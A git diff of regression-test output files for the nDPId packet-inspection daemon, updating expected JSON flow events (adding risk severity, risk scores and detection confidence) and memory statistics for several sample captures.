 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":600000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":600000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
 00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","total-events-serialized":568}
@@ -574,9 +574,9 @@
 ~~ total active/idle flows...: 85/85
 ~~ total timeout flows.......: 17
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4726140 bytes
-~~ total memory freed........: 4726140 bytes
-~~ total allocations/frees...: 100146/100146
+~~ total memory allocated....: 4776485 bytes
+~~ total memory freed........: 4776485 bytes
+~~ total allocations/frees...: 101736/101736
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 177 chars
 ~~ json string max len.......: 1559 chars
diff --git a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out
index fa1925989..af95dd5fd 100644
--- a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out
+++ b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 178 chars
 ~~ json string max len.......: 463 chars
diff --git a/test/results/fuzz-2021-10-13.pcap.out b/test/results/fuzz-2021-10-13.pcap.out
index 5beac1b9b..4d43b7602 100644
--- a/test/results/fuzz-2021-10-13.pcap.out
+++ b/test/results/fuzz-2021-10-13.pcap.out
@@ -10,9 +10,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 555 chars
diff --git a/test/results/genshin-impact.pcap.out b/test/results/genshin-impact.pcap.out
index 0327723f3..d83421453 100644
--- a/test/results/genshin-impact.pcap.out
+++ b/test/results/genshin-impact.pcap.out
@@ -1,22 +1,22 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"genshin-impact.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1615497372822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1615497372822,"pkt":"eJS0JASgYDjgxTWgCABFAAAwrR4AAD8RTEjAqAJkL\/WPVeWOVlUAHPQTAAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="}
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1615497372843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1615497372843,"pkt":"YDjgxTWgeJS0JASgCABFAAAwK09AADcRlhcv9Y9VwKgCZFZV5Y4AHKXfAAABRQADGDI6DaIVSZYC0hRRRUU="}
 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1615497372883,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1615497372883,"pkt":"eJS0JASgYDjgxTWgCABFAADFrx4AAD8RSbPAqAJkL\/WPVeWOVlUAsVF7MhgDABWiDTpRAAABg6QlIwAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZwkZnnlWAs83g1p8EKxdCAGrvC1rqvpVXt+DS9GDIp59mUEo7M9A0R8PnQy3bk3e+QGIcWRmxHcBqUQOH+f\/uJk3ozIYAwAVog06UQAAAYOkJSMBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BfbJ9hSIrPxLFWnBNUYf2O83uxMA=="}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1617969465739,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1617969465739,"pkt":"eJS0JASgYDjgxTWgCABFAAAwIDwAAD8RvwnAqAJkL\/6pbecJVlYAHFkOAAAA\/wAAAAC6msTNSZYC0v\/\/\/\/8="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1617969465761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1617969465761,"pkt":"YDjgxTWgeJS0JASgCABFAAAwmj1AADcRDQgv\/qltwKgCZFZW5wkAHNyDAAABRQACIqy6msTNSZYC0hRRRUU="}
 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1617969465796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"ts_msec":1617969465796,"pkt":"eJS0JASgYDjgxTWgCABFAACLETwAAD8Rza7AqAJkL\/6pbecJVlYAd4PurCICAM3EmrpRAAABbMl+tgAAAAAAAAAAUwAAAOjKqWZw60qL9Yt3tYWQf\/bh4A8CmEwZmVNWIKRXCgqptAdyiLYHXIWEStbbdMV+nhEs6cNA1hYEnQ\/rbBPfqVmPcWA0wHkHrhALTrzN2JnmCbMb"}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1618759616491,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1618759616491,"pkt":"eJS0JASgYDjgxTWgCABFAAAwGRQAAD8RUQ3AqAJkCNFFv81fVlUAHHz9AAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="}
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1618759616511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1618759616511,"pkt":"YDjgxTWgeJS0JASgCABFAAAwBJVAADYRLowI0UW\/wKgCZFZVzV8AHCclAAABRQAC8VwSg\/gZSZYC0hRRRUU="}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1618759616572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1618759616572,"pkt":"eJS0JASgYDjgxTWgCABFAADFKAcAAD8RQYXAqAJkCNFFv81fVlUAsRpMXPECABn4gxJRAAAB+IeX5QAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZxk9sU5aAs83g1pzHa9XCgisvC1r9\/0GCIzdTdWOJM16x0h+u8IR0UsPmVrqPkXeqgnccmMxz3oCrkMOS+f\/uJk3o1zxAgAZ+IMSUQAAAfiHl+UBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BffbtOf4bPxP18xxJUYUezQnixMA=="}
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
+00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":45,"source":"genshin-impact.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 45/45
@@ -26,10 +26,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598534 bytes
-~~ total memory freed........: 4598534 bytes
-~~ total allocations/frees...: 99604/99604
+~~ total memory allocated....: 4682831 bytes
+~~ total memory freed........: 4682831 bytes
+~~ total allocations/frees...: 101194/101194
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 721 chars
-~~ json string avg len.......: 514 chars
+~~ json string max len.......: 830 chars
+~~ json string avg len.......: 569 chars
diff --git a/test/results/git.pcap.out b/test/results/git.pcap.out
index 60c375c05..f42faaebc 100644
--- a/test/results/git.pcap.out
+++ b/test/results/git.pcap.out
@@ -3,8 +3,8 @@
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"proto":"Git","breed":"Safe","category":"Collaborative"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Git","breed":"Safe","category":"Collaborative"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
 00151{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 90/90
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597439 bytes
-~~ total memory freed........: 4597439 bytes
-~~ total allocations/frees...: 99643/99643
+~~ total memory allocated....: 4682392 bytes
+~~ total memory freed........: 4682392 bytes
+~~ total allocations/frees...: 101233/101233
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 156 chars
-~~ json string max len.......: 650 chars
-~~ json string avg len.......: 463 chars
+~~ json string max len.......: 676 chars
+~~ json string avg len.......: 475 chars
diff --git a/test/results/google_ssl.pcap.out b/test/results/google_ssl.pcap.out
index 9891d2e86..260347b5b 100644
--- a/test/results/google_ssl.pcap.out
+++ b/test/results/google_ssl.pcap.out
@@ -3,7 +3,7 @@
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"}
